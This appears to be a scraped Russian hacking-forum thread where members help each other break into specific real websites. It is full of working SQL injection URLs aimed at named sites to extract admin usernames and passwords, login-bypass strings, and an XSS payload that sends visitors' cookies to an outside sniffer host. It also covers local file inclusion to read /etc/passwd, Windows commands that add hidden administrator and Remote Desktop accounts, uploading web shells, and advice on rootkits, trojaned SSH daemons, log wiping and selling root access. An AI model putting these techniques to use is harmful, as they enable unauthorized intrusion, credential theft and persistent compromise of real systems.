Есть сервак Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1

на запросы типа
(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.T ABLES)--
пишет mofo Incorrect syntax near the keyword 'TOP'.

@@version--
(select db_name())--
(select system_user)--

Выполняются без проблем. Как обойти?

юзай поиск https://forum.antichat.ru/showthread.php?t=65041

юзай поиск https://forum.antichat.ru/showthread.php?t=65041

1+or+1=(SELECT+1+max(TABLE_NAME)+FROM+INFORMATION_ SCHEMA.TABLES)--

mofo Line 1: Incorrect syntax near 'max'.

id=1+or(1=(select(max(table_name))from[information_schema].tables))--

mofo An aggregate may not appear in the WHERE clause unless it is in a subquery contained in a HAVING clause or a select list, and the column being aggregated is an outer reference.


ваще хз даж как это можно перевести....совокупности нет в запросе WHERE?

все остальное из той темы ругается или на TOP или на FROM. Пробовал в разных регистрах

Есть сервак Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1

на запросы типа
(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.T ABLES)--
пишет mofo Incorrect syntax near the keyword 'TOP'.

@@version--
(select db_name())--
(select system_user)--

Выполняются без проблем. Как обойти?
Раггейм решил похекать? ну-ну...

Всем привет ,Нашел скулю,порыл оказалось несколько баз WP,joomla, самого сайта база и еще пару штук,доступ ко всем базам есть.админку самого сайта я так и не нашел,даже базу ковырять не стал
Вопрос: как определить к каким сайтам принадлежат другие базы?если возможно конечно.
Ап вопрос решил)))
вытащил контент из базы,наешл сайт по гуглу )

Привет всем. Вопрос: Нашол активную xss, НО фильт обрезает все ссылки. То есть <script>alert()</script> катит, всплывает окошко, а при попытке впихнуть снифер обрезает ссылку. Например, <a href="javascript:void win('page1.html')">page1</a> вот такой код обрезает до <a href="

Помогите, спасибо зарание!

Всем привет ,Нашел скулю,порыл оказалось несколько баз WP,joomla, самого сайта база и еще пару штук,доступ ко всем базам есть.админку самого сайта я так и не нашел,даже базу ковырять не стал
Вопрос: как определить к каким сайтам принадлежат другие базы?если возможно конечно.
Ап вопрос решил)))
вытащил контент из базы,наешл сайт по гуглу )
для WP:
select option_value from wp_options where option_name='siteurl'

Привет всем. Вопрос: Нашол активную xss, НО фильт обрезает все ссылки. То есть <script>alert()</script> катит, всплывает окошко, а при попытке впихнуть снифер обрезает ссылку. Например, <a href="javascript:void win('page1.html')">page1</a> вот такой код обрезает до <a href="

Помогите, спасибо зарание!
<script src=http://ссылка_скрипт_с_кодом.js>

Некатит, может потому что xss во выдвигающемся меню, так только текс. А картинка наверное не грузится(
Вот в такой байде xss
<select name="poll_answer">
<option value="54033"><img src='h<script> img = new Image(); img.src = 'http://httpz.ru/123456.gif?'+document.cookie; </script></option>
</select>


Сам код на страницу попадает, но из-за тегов нет обращения к картинке(((

Здраствуите

кто знает kak можно узнать где на сайте располагается Страничка для входа админа.

Если это простой перебор ( www.xxx.ru/admin, /login , /backend ...) то у кого нибудь есть список самых стандартных ?

спосиб..))

Здраствуите

кто знает kak можно узнать где на сайте располагается Страничка для входа админа.

Если это простой перебор ( www.xxx.ru/admin, /login , /backend ...) то у кого нибудь есть список самых стандартных ?

спосиб..))
http://forum.antichat.ru/thread40031.html

Драсьте.
Есть админка: http://www.site.com/admin/file.jsp, в админке 2 стандарт поля "логин" и "пасс". При подстановке в логин кавычки, выскакивает
ERROR: Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and ad_pass=''' at line 1"
При вставке в пасс
ERROR: Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1"
Есть ли возможность забраться в админку? И значит ли это, что там инъекция?
Заранее спасибо, и извиняюсь, если вопрос глупый.

попробуй в логин ' or 1=1/* пасс чо хочешь

попробуй в логин ' or 1=1/* пасс чо хочешь
Я тоже так сразу подумал. Походу фильтруется /*
ERROR: Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and ad_pass='qwerty'' at line 1"

Я тоже так сразу подумал. Походу фильтруется /*
ERROR: Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and ad_pass='qwerty'' at line 1"
вместо /* попробуй -- или #

' or 1=1%20--%20
lol не lol, а фильтр все равно не пускает
'%20' and ad_pass='12345'' at line 1"

lol не lol, а фильтр все равно не пускает
'%20' and ad_pass='12345'' at line 1"
*-- 1*

вместо /* попробуй -- или #
спасибо братан, получилось. Прошло с #,

2 z00MAN

Блин я не могу запустить, нету прав админа на компе (((. попробовал : madnet.name/tools/madss/ ..... ничего не показал. Есть что нибудь еще ?

2 z00MAN

Блин я не могу запустить, нету прав админа на компе (((. попробовал : madnet.name/tools/madss/ ..... ничего не показал. Есть что нибудь еще ?
заюзай дедик стоит 1-3 бакса

помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)
http://www.kstu.ru/1leveltest.jsp?idparent=189+select+union+null+from +SYS.DUAL

помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)

Гнусный оракл :mad:

http://www.kstu.ru/al_spis_sotr.jsp?first=9'+union+select+null,table_ name,null,null,null,null,null+from+sys.all_tables--+

del

Microsoft JET Database
http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+golovoi_op_ stenu
не как не могу подобрать таблицу =(

http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user

http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user
уверен ?
"select ... from user" использоваться нельзя, так как user это внутреннее имя и таблицой оно быть не может.
_http://forum.antichat.ru/threadnav50550-3-10.html

К MSysObjects доступа нет, так что только перебором

Кста там обход авторизации возможен http://www.bestperiodica.com/MyAccount.asp
В E-mail ' or '1'='1#
в пароль что угодно

короче, есть бажный сайт:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/*
в нем столько табличек:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+informati on_schema.tables+limit+86,1/*
самые интересные это:
modx_active_users -тридцатая
modx_manager_users -37
modx_web_users -66
из них получаем столбцы:
username
password
но когда я хочу просмотреть эти столбцы вводя например вот это:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_man ager_users+limit+1,1/*
то никакого имени и пароля не получается!
может я не так что-то делаю, помогите кто может.

lucky_guy, выводи во 2ое поле...
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,concat_ws(0x3a,id,username,pa ssword)+from+modx_manager_users/*

короче, есть бажный сайт:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/*
в нем столько табличек:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+informati on_schema.tables+limit+86,1/*
самые интересные это:
modx_active_users -тридцатая
modx_manager_users -37
modx_web_users -66
из них получаем столбцы:
username
password
но когда я хочу просмотреть эти столбцы вводя например вот это:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_man ager_users+limit+1,1/*
то никакого имени и пароля не получается!
может я не так что-то делаю, помогите кто может.
т к в таблице modx_manager_users всего одна запись, то поэтому limit+1,1 ничего не выводит.

c limit+0,1 всё нормально:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_man ager_users+limit+0,1/*

спасибо=)

Залил шелл... Но имею доступ только к той папке, где находится шелл!
/imgs/ drwxr-xr-x и всё...
В чём дело? :(

:.']Залил шелл... Но имею доступ только к той папке, где находится шелл!
/imgs/ drwxr-xr-x и всё...
В чём дело? :(
Дело наверное или в твоих руках..или в правах на папки выше.
/tmp/ доступно?)

Да.

.:[melkiy]:.
Что значит в чем дело? о_0 Права грамтные, пробуй порутать.

Скажите где мона почитать на тему бэккоект шела и бинд порта из вебшела.

Скажите где мона почитать на тему бэккоект шела и бинд порта из вебшела.
https://forum.antichat.ru/showthread.php?t=30711
http://forum.antichat.ru/showpost.php?p=137357&postcount=1
мб пригодится

кто поможет найти админку http://cards.intbel.ru/???
есть у кого нить таблица для поиска админки? ну типа:
adm/
admin/
admin.php
итд
желательно побольше

только эту нашел _http://admin.intbel.ru

Insane bboy
1. Админки может не быть
2. Админка может быть на порту.
3. Админка может быть на субдомене.
4. Юзай pelmeshko skaner, он ищет диры и файлы. Удачи.

Пасиб.За ссылки.А для чего руткиты? Допустим я рут с помощью эксплоита. И че дальше?

Пасиб.За ссылки.А для чего руткиты? Допустим я рут с помощью эксплоита. И че дальше?
Дальше? Ну допустим оставляешь бэкдор. Дальше? если ты не знаешь для чего тебе может понадобится рут, то проще будет его продать.

http://space.jpl.nasa.gov/analog.txt

Что за нах? о_0
Там в конце документа вообще какие-то GET-запросы о_0... Мол там каждый 2ой пытается шелл залить =\

//Моно использовать вместо илворма, т.к. там все баги в Джумле о_0

ок, это как раз то что надо:) спс

Krist_ALL
Руткит, чтобы закрепится в системе, не будешь же ты каждый раз юзать сплоит, чтобы стать рутом. С помощью руткита модно более менее замести следы...
Что дальше? Дальше поднять VNC и продать, юзать самому, поднять права на сайтах и продать и т.д..

1. Именно с руткитом много возни, проше затроянить SSH демона
2. Руткит не заметает следы! этим занимаются логвайперы

Что дальше? Дальше поднять VNC и продать, юзать самому, поднять права на сайтах и продать и т.д..
Это еще что за приколы? VNC нахрена? Есть же ssh. "Поднять права на сайтах" ч0 ч0? куда дальше, если ты уже рут?

BlackSun
На счет 2ого пункта не знал, спасибо ;) По поводу VNC я привет пример привел, троянить ssh демона я ни разу не пробовал, только читал, поэтому не написал. А по поводу поднять права, поднять права до 777, чтобы с веб-шелла можно было иметь полный доступ!

Менять чмоды - палево, очень большое палево, проше залить cgi шелл, сменить овнера на того юзера, в чьей папке лежит шелл и поставить SUID \ GUID бит

Неспящие, бодрой ночи!

Народ, mysql 5.0.45-log выдает следующее (логин:пароль):


user1:yћ+Ў»?ЏкцпGЅZ‡
user2:YТа#аІ2˜А>.¶tHј
user3:ќлО1tМxU©Г_k¤
user4: ЧЁq…fФ¦ШWgL¶3


А теперь вопрос. Чем закодирован пароль?

Вопрос такой: Что надо прописать в .htaccess, лежащем в корне сайта, чтобы файл images/img_cat002/image.jpg выполнялся как php-скрипт??

<FILES "images/img_cat002/image.jpg">
addtype application/x-httpd-php .jpg
</FILES>

Spyder, Apache-2.0/PHP-5.2.10 (Win) Не работает :(
Даже просто запрет на просмотр не работает

<Files readdir.php>
order allow,deny
deny from all
</Files>

нард извеняйте если не туда написал! у меня есть логин и пароль от админки сайта укоз! как узнать ответ на секретный вопрос?

Заработало. Надо было изменить в httpd.conf
AllowOverride None
на
AllowOverride All

Есть сайт
http://site.ru/index.php?t=core&f=bonusss
t= директория
f= фаил

попробовал t=./&f=main
Мне цикл страницы маин начал вертеть.
Можно как-то инклуд сделать?

Врятли. так как выход из папке вверх сопровождается ../ так а не ./ а ты хоть t=./././././&f=main так сделай толку ни какого

Byrger
Если начала открываться страница в цикле, то это уже инклюд... Файл сам себя инклюдит.
Если стоит base_dir, то ничего не выйдет, а так пробуй:
t=../../../../../../../../../../../../../etc
f=passwd%00 or ./ 4095 раз, если слишком длинный скажет, то обрезай пока не выведется экран. В лучшем случае проинклюдишь /etc/passwd.
В расчет бралась ОСь Linux.

if (!IsSet($t)&!IsSet($f))
{
$f="main";
$filename=$f . ".php";
}
else
{
if ((IsSet($t)&!IsSet($f))and(file_exists($t."/index.php")))
{
$filename=$t . "/index.php";
}
if ((IsSet($t)&IsSet($f))and(file_exists($t."/".$f.".php")))
{
$filename= $t . "/" . $f . ".php";
}
if ((!IsSet($t)&IsSet($f))and(file_exists($f . ".php")))
{
$filename=$f . ".php";
}
}

if (file_exists("$filename"))
{ include("$filename"); }
else
{ echo " <div class=\"alert\"> Îøèáêà 404, Ñòðàíèöà íå íàéäåíà. </div>"; }
Вот код который там подгружает страницы


Врятли. так как выход из папке вверх сопровождается ../ так а не ./ а ты хоть t=./././././&f=main так сделай толку ни какого
а никто не сказал что в верх уходим ;)
Скрипт в основном каталоге

И ошибочка не маин а index

да это инклуд :) Был не прав))просто кода не видел из начально

для данного примера
если magic_quotes_gpc = On и allow_url_include = Off то инклуда не выйдет
если allow_url_include = On то возможен RFI хотя могу ошибаться..
magic_quotes_gpc = Off и allow_url_include = Off то тут только LFI
хотя еще интересно откуда взял код этого скрипта

для данного примера
если magic_quotes_gpc = On и allow_url_include = Off то инклуда не выйдет
если allow_url_include = On то возможен RFI хотя могу ошибаться..
magic_quotes_gpc = Off и allow_url_include = Off то тут только LFI
хотя еще интересно откуда взял код этого скрипта

шаровый двиг.
У самого такой стоял...какойто умелец нацарапал : )
Ну вот на моём примере что-то можно сделать? тут 1 я виу что проверка только file_exists()

Ну вот на моём примере что-то можно сделать? тут 1 я виу что проверка только file_exists()


http://forum.antichat.ru/thread23501.html ctrl +f "file_exists". Только LFI

http://forum.antichat.ru/thread23501.html ctrl +f "file_exists". Только LFI
почему только LFI?
при определенной удаче(allow_url_include = On) можно. Допустим если разместить шелл на ftp

Pashkela, null байт и его замены не проходят
bons, пробовал на фтп залить...но когда указываю до фтп путь ничего не происходит
даж скрипт на false не уходит.
В чём может быть трабла? простто стараница пустая.

через 5мин...
Залил шелл на фтп с99 при открытии с сайта видна только шапка шелла...

через 10мин
Он просто обрезает шелл уже и р57 попробовал
Срезает по середине скрипта и всё...

лью шелл в пхп бб 2.0.21 через Стили http://forum.antichat.ru/thread24488.html
получяю следующую ошибку:
./../templates/tmp/theme_info.cfg in /var/virtual/www/l.ru/httpdocs/forum/admin/admin_styles.php on line 78
Warning: include(./../templates/tmp/theme_info.cfg) [function.include]: failed to open stream: No such file or directory in /var/virtual/www/l.ru/httpdocs/forum/admin/admin_styles.php on line 78
Warning: include() [function.include]: Failed opening './../templates/tmp/theme_info.cfg' for inclusion (include_path='.') in /var/virtual/www/l.ru/httpdocs/forum/admin/admin_styles.php on line 78

Можно ли получить RDP доступ?
1 рутишь... это уже сам
2 создаешь админскую учетку:
net user учетка пароль /add
net localgroup administrators учетка /add
net accounts /maxpwage:unlimited

3 пуск -> выполнить -> mstsc.exe

Залей шелл к примеру от р57 и все команды по порядку кликая выполнить.

Не помогает ((( к RDP подключается, проблемы с авторизацией
недо еще пользователя добавить в группу пользователей удаленного рабочего стола(Remote Desktop Users)
не всем пользователям разрешен доступ по RDP

net localgroup "Remote Desktop Users" учетка /add

1 рутишь... это уже самА это зачем???

net user USER PASS /add
net localgroup Administrators USER /add
net localgroup "Remote Desktop Users" /add
net accounts /maxpwage:unlimited

Если винда русская:
Administrators = Администраторы
Remote Desktop Users = Пользователи удаленного рабочего стола

Какким шеллом можно сдампить БД
Но БД весит более 500мб, надо что-то сильное
Но проблема в том что на всех каталогах права на чтение кроме tmp/
Тоесть надо чтоб он сразу дал скачать или с возможностью сохранение на FTP

http://sypex.net/

http://sypex.net/
Ему нужна папка для сохранения дампа.


И такой вопрос... Если есть доступ к БД то можно как-то в систему на которой стоит БД залезть?

Ему нужна папка для сохранения дампа.


И такой вопрос... Если есть доступ к БД то можно как-то в систему на которой стоит БД залезть?
да, но при определенных условиях.

Ему нужна папка для сохранения дампа.
Что тебе мешает залить в /tmp а потом скачать через шелл?

PHP Parse error: parse error in *:\*\site.com\wwwroot\111.php(3) : ....... ..

<?php
eval('net user user pass /add');
eval('net localgroup Administrators user /add');
eval('net localgroup "Remote Desktop Users" user /add');
eval('net accounts /maxpwage:unlimited');

это всё про RDP =/

DeluxeS, eval выполняет php код, а тебе нужно системный, юзай system() или аналоги.

http://www.royalgroup.it/ita/offerte_speciali.htm?id_prodotto_sel=64&id_albergo=1179'
возможно ли раскрутить скулю?

http://www.royalgroup.it/ita/offerte_speciali.htm?id_prodotto_sel=64&id_albergo=1179'
возможно ли раскрутить скулю?
нет

unu']можно т.к времени крутить сейчас нет скину просто слепую
http://www.royalgroup.it/ita/offerte_speciali.htm?id_prodotto_sel=64/**/aNd/**/substring(version(),1,1)=5--&id_albergo=1179

Попробуй покрутить blind sql т.к стоит некая фильтрация запроса я так понял что union+select :(

ничего не происходит, перебрасывает лишь на verticalbooking.com, причем при любых значениях...

http://www.royalgroup.it/modulo_eventi_gruppo/6242_Offerta_Speciale_Meeting_a_Napoli.htm?id_sezi one=6394+and+substring(version(),1,1)=5
Вот тут работает,5ая ветка.

http://www.advantage.am/newsArticle.aspx?id=95'a

a 4to taoe eto?? s nim 4tota zdelat mojno??[I]

Это не MSSQL:
Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082

a 4to mojno zdelat??[I]

Проблема глупая, но ещё не сталкивался. Стянул с хоста файл- "passwd" соответственно в нём логины такого вида

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
test:x:0:0:test:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:

И перечисляются все пользователи. А теперь глупый вопрос- пароли только подбирать или они на хосте где-то валяются?

Проблема глупая, но ещё не сталкивался. Стянул с хоста файл- "passwd" соответственно в нём логины такого вида



И перечисляются все пользователи. А теперь глупый вопрос- пароли только подбирать или они на хосте где-то валяются?
/etc/shadow

/etc/shadow

только если ты не руут то врятли получиш к ним доступ :)

только если ты не руут то врятли получиш к ним доступ :)
на вопрос ответил, и ладно.

Помогите разобраться, пытаюсь провести инъекцию но не могу определить количество полей сделал запрос вот такой www.sait.ru/profile.php?id=-1+union+select+1-- выдал вот такую ошибкуYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.`st_id` = `ff_users`.`st_id` AND `ff_status`.`lng_id` = 1' at line 55 file:/var/www/site.ru/profile.php line:186
Пытался перебирать поля дошел до 30 и все равно тоже самое((((Help me((

bleeep, полей может быть хоть 150, используй order+by

Помогите разобраться, пытаюсь провести инъекцию но не могу определить количество полей сделал запрос вот такой www.sait.ru/profile.php?id=-1+union+select+1-- выдал вот такую ошибку
Пытался перебирать поля дошел до 30 и все равно тоже самое((((Help me((


Зачем сразу union+select делать? вначале узнаю сколько колонок- order+by+x--

где x то кол-во при котором у тебя не выдает ошибку, то есть при 61 есть ошибка а при 60 нету , значит у тебя 60 колонок и => union+select+1,2,...,59,60--

Помогите разобраться, пытаюсь провести инъекцию но не могу определить количество полей сделал запрос вот такой www.sait.ru/profile.php?id=-1+union+select+1-- выдал вот такую ошибку
Пытался перебирать поля дошел до 30 и все равно тоже самое((((Help me((
добиться вывода не удалось . закончил вот на этом?id=34316+union+select null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null from ff_for,ff_users, ff_status where 1=1 OR 1=1
mysql gone down )))

крутить можно как слепую.
?id=34316+and+substring(version(),1,1)=5

з.ы. сиськи с сайта сильно мешают думать.

Привет всем
Как обойти ....

При запросе

union+select+user_name+from+user/* order+by+abc

фильтруется _ и запрос выглядит как

union+select+user+order+by+abc

так же происходит при LOAD_FILE

в общем в любом месте _ переводится в пробел и все что следом отбрасывается

CHAR, %5F, все не помогает

Какие есть соображения?

PS ' - экранируется

Привет всем
Как обойти ....

При запросе

union+select+user_name+from+user/* order+by+abc

фильтруется _ и запрос выглядит как

union+select+user+order+by+abc

так же происходит при LOAD_FILE

в общем в любом месте _ переводится в пробел и все что следом отбрасывается

CHAR, %5F, все не помогает

Какие есть соображения?

PS ' - экранируется

unhex(hex(user_name)) ?
aes_decrypt(aes_encrypt(user_name)) ?

unhex(hex(user_name)) ?
ase_decrypt(aes_encrypte(user_name)) ?

ase_decrypt - недопустимо тк _ вырежется
unhex(hex(user_name)) - тоже не допустимо _ присутствует

unhex(757365725F6E616D65) - 1054 - Unknown column '757365725F6E616D65' in 'field list'

колонка user_name - 100% есть

unhex(hex(user_name)) ?
aes_decrypt(aes_encrypt(user_name)) ?
Каким образом это поможет то?

Сорри что ещё раз повотряю вопрс.
Как можно залезть на машину юзера если у меня есть полный доступ к MySQL?

Зачем сразу union+select делать? вначале узнаю сколько колонок- order+by+x--

где x то кол-во при котором у тебя не выдает ошибку, то есть при 61 есть ошибка а при 60 нету , значит у тебя 60 колонок и => union+select+1,2,...,59,60--
А есть какя нибудь программка чтобы вручную не перебирать числа?)

А есть какя нибудь программка чтобы вручную не перебирать числа?)
куча.
вот тут (http://www.xaker.name/forvb/archive/index.php/t-12116.html) например

Сорри что ещё раз повотряю вопрс.
Как можно залезть на машину юзера если у меня есть полный доступ к MySQL?
если под root'ом..значит есть FILE_PRIV//если есть FILE_PRIV значит можно залить шелл(если есть папка на запись)
>google.ru>site:antichat.ru залить шелл через mysql
Обсуждалось..и не раз.

А есть какя нибудь программка чтобы вручную не перебирать числа?)
Хмм, зачем програмки? проблемма решается одним, ну максимум двумя запросами, при помощи всё той же конструкции order+by…

если под root'ом..значит есть FILE_PRIV//если есть FILE_PRIV значит можно залить шелл(если есть папка на запись)
>google.ru>site:antichat.ru залить шелл через mysql
Обсуждалось..и не раз.

А что делать с шеллом если нет апатча на машине с бД?

Если есть БД - значит должен быть какой-нибудь сервак... неважно, апач это или нет... ;)

Если есть БД - значит должен быть какой-нибудь сервак... неважно, апач это или нет... ;)

Машина используется под БД и ещё 2 ПО которые работают с этой БД

тщательно изучи БД на наличие таблиц с паролями. Если таковые есть, то отметь вероятные пароли ssh-юзеров(примерный список ssh-юзеров в /etc/passwd, идентификаторы от 1000). Попробуй к ssh пароли от самой БД

А что делать с шеллом если нет апатча на машине с бД?
Ну тогда смотри /etc/passwd///*бывают* случаи когда у мускуля стоит доступ к ssh ///Я сам если чесна не встречал..но где то на форуме чел именно писал о таком случае.
Вот нашёл
http://forum.antichat.ru/showthread.php?t=111913
Больше вариантов я не вижу..разве в что в надежде подставлять пароли из бд к ссш..

Там Винда похоже
Так как SSH не запрашивает логин когда коннектись к этому ИП
Но и удалёнка тоже молчит.

2 Byrger
А что ты сам хочешь от сервака? Какая цель конечная?

Вариант - читать файлы в таблицу и просматривая их двигаться дальше
Рутовский пас пробуй с логином Administrator (если винда) к имеющимся сервисам - FTP, RDP etc

2 Byrger
А что ты сам хочешь от сервака? Какая цель конечная?

Вариант - читать файлы в таблицу и просматривая их двигаться дальше
Рутовский пас пробуй с логином Administrator (если винда) к имеющимся сервисам - FTP, RDP etc

Надо слить файлы оттуда
Просканих xSpider`ом открыто 3 покта
2 это 2 для этого ПО
1 это MySQL

Может можно как-то просмотреть где находятся файлы...и слить?

Да если есьт шелл на http серваке, ставь проксю его, FreeCap на удалённый менеджер mYSQL
Думаю юзера и пасс знаешь.
Если знаешь то впустит.

есть сайт, на котором лично я ничего не нашел, ни одной дырочки. Но на том же ИП крутиться еще более 200 сайтов. Как просканить эти сайты на уязвимости автоматически,ибо вручную не хватит и всей жизни.

есть сайт, на котором лично я ничего не нашел, ни одной дырочки. Но на том же ИП крутиться еще более 200 сайтов. Как просканить эти сайты на уязвимости автоматически,ибо вручную не хватит и всей жизни.
Вручную парниш :)
Рандомом выбери и посмотри.
Или же смотри на античате в скулях или инклюдах.

Говорил с суппортом одного хостинга, он говорит, что в современных хостах все акки изолированны друг от друга, что взлом через смежные сайты невозможен. Правда это или гон?

Говорил с суппортом одного хостинга, он говорит, что в современных хостах все акки изолированны друг от друга, что взлом через смежные сайты невозможен. Правда это или гон?
Как пафосно то :) реклама не более. Всё зависит от хостера... Что значит "в современных хостах"? :) Он тебе описал скорее не "современные хосты", а то как должно быть у нормального хостера... а дебилы, как были, так и будут, хоть у "современных", хоть у "старомодных" хостеров...

Правда конечно. Что ты

очень прошу помочь раскрутить скулю: http://www.poraduy.ru/catalog/?id=99'

очень прошу помочь раскрутить скулю: http://www.poraduy.ru/catalog/?id=99'
http://www.poraduy.ru/catalog/?id=-99+union+select+group_concat(column_name+separator +0x0a)+from+information_schema.columns+where+table _name=0x70687062625f61636c5f7573657273

Сделал запрос в ту маштнку такого вида
SELECT 1,2,3,LOAD_FILE('../../../etc/passwd'),5,6,7 FROm access
Мне выдался passwd как с помошью него можно на сервер залезть?

Пытался через Pytty подключится но сказал типо сервер недоступен...даже не спросил логин

[x60]unu,DrAssault большое спасибо, но не могли бы Вы раскрутить до имени и пароля админа, ибо в данном случае я не понял, как были подобраны поля и столбцы...

Может сразу шелл?
Одно дело помочь ответив на вопрос, другое просить взломать за тебя.
Тема не для просьб о взломе - для этого есть специальный раздел.

Сделал запрос в ту маштнку такого вида

Мне выдался passwd как с помошью него можно на сервер залезть?

Пытался через Pytty подключится но сказал типо сервер недоступен...даже не спросил логин

думаю ни как , тебе нужен не passwd а shadow файл , но shadow файл тебе не открыть , так как у него права тока руута

тебе нужен не passwd а shadow файл , но shadow файл тебе не открыть , так как у него права тока руута


т.е. вы реально думаете, что открыв и прочитав /etc/shadow вы будете владеть сервером?

т.е. вы реально думаете, что открыв и прочитав /etc/shadow вы будете владеть сервером?

ну я не сказал про владельца сайта, а просто сказал ему что он ищет пассы не в том файле , и скажи пожалуйста Pashkela что же за пассы там хранятся :)

Да не смог открыть, а что можно попробовать сделать?
Просто очень нужно слить пару файлов.

Да не смог открыть, а что можно попробовать сделать?
Просто очень нужно слить пару файлов.


ну раз у тебя пашет load_file то не пробовал проверить file_priv и лить шелл через into outfile?

ну раз у тебя пашет load_file то не пробовал проверить file_priv и лить шелл через into outfile?
А смысл лить шелл?
Как я его потом запущу если на сервере нет апача?

на сколько я понимаю апач тут не при чем у тебя же идет запрос к БД а не к апачу или ПО которое ты там написал,

ЗЫ проще попробовать а потом спросить

ну я не сказал про владельца сайта, а просто сказал ему что он ищет пассы не в том файле , и скажи пожалуйста Pashkela что же за пассы там хранятся :)

Не парьтесь, залейте для начала шелл, дальше по обстановке и в связи с осознанием полученной информации

Плюс если у вас LFI или читалка - это даёт гораздо большие возможности, чем просто даже сразу (допустим) прочитать /etc/shadow

Хотя бывает и такое


Как я его потом запущу если на сервере нет апача?


забавно. Правда, забавно. Ну тогда сушить вёсла, наверное

т.е. вы реально думаете, что открыв и прочитав /etc/shadow вы будете владеть сервером?
ч0 не? просвети нас, великий хакер!

2 BlackSun:

Ну если пароль расшифруешь, то да, о Генианельнейший из Гениев

http://s40.radikal.ru/i087/0905/8e/a0bb203ffe39.jpg

ыыыыыыы

PS: бывают такие LFI, что /etc/shadow можно прочитать, но это не значит, что вы сможете залить хотя бы даже ВЕБ-ШЕЛЛ

a kak uznat magic_qupte on ili off??

i kak uznat file_priv Y ili N ??[I]

Например:
http://google.com/news.php?id=0+union+select+1,File_priv,3+from+mysq l.user--

так мы узнаем File_priv

magic_quotes = off или On

http://google.com/news.php?id=0+union+select+1,'p',3+from+mysq l.user--

если результатом будет буква p тогда M_Q=off если же будет ошибка , тогда M_Q=on

magic_quotes = off или On

http://google.com/news.php?id=0+union+select+1,'p',3+from+mysq l.user--

если результатом будет буква p тогда M_Q=off если же будет ошибка , тогда M_Q=on
А если колонки не подобрал.....а если запрос не закрыл...(и ещё пару десятков вариантов)и вылезла ошибка..значит MQ=On? думай что пишешь.

ob etix funkciyax est statya ??

скажите есть ли виждет для оперы, с помощью которого можно перехватывать http пакеты и изменять их.

не могу найти принтабельный столбец, хотя вроде их всего 1 )

http://www.aawow.info/question2.php?id=-31+union+select+1--

хелп)

не могу найти принтабельный столбец, хотя вроде их всего 1 )

http://www.aawow.info/question2.php?id=-31+union+select+1--

хелп)

http://www.aawow.info/question2.php?id=-31+union+select+version()

В тайтле смотри 5.0.81-community-log

пытаюсь названия таблиц вывести таким запросом: http://www.aawow.info/question2.php?id=-31+union+select+table_name+from+information_schema .tables+where+table_schema=%27aawowinf_wow%27

в ответ - ошибка.....

http://www.aawow.info/question2.php?id=-31+union+select+table_name+from+information_schema .tables+where+table_schema=0x6161776f77696e665f776 f77

Может стоит немного почитать статьи ? (

ElteRUS, читал, но просто прочитать, а потом раскрутить любую скулю сложно...

нашел интересные имена таблиц, users и userlist, подставляю их в запрос:

http://www.aawow.info/question2.php?id=-31+union+select+column_name+from+information_schem a.columns+where+table_name=7573657273

выводит WoW в тайтле.
Как получить всю интересующую нас инфу из этой таблицы? Если возможно, то без Limit?

group_concat()

_http://www.aawow.info/question2.php?id=-31+union+select+group_concat(column_name)+from+inf ormation_schema.columns+where+table_name=0x7573657 26c697374

0x757365726c697374 = userlist

ElteRUS, читал, но просто прочитать, а потом раскрутить любую скулю сложно...

нашел интересные имена таблиц, users и userlist, подставляю их в запрос:

http://www.aawow.info/question2.php?id=-31+union+select+column_name+from+information_schem a.columns+where+table_name=7573657273

выводит WoW в тайтле.

Если не ошибаюсь то надо не table_name а table_schema
Темболее нужно в хекс коде (точнее: 0x + HEX) подставлять если работаешь через where (если фильтруются ковычки)

Сильно не пинайте
как подкючится к чужой БД, естественно зная логин и пороль :)))

в таблице users оказалисьнесколько интересных записей: name, pass

Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273

Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...

Сильно не пинайте
как подкючится к чужой БД, естественно зная логин и пороль :)))
Заюзать скрипт или прогу :) если есстественно разрешен конект из вне...

в таблице users оказалисьнесколько интересных записей: name, pass

Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273

Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...


жжёшь, ты читал хоть что-то?


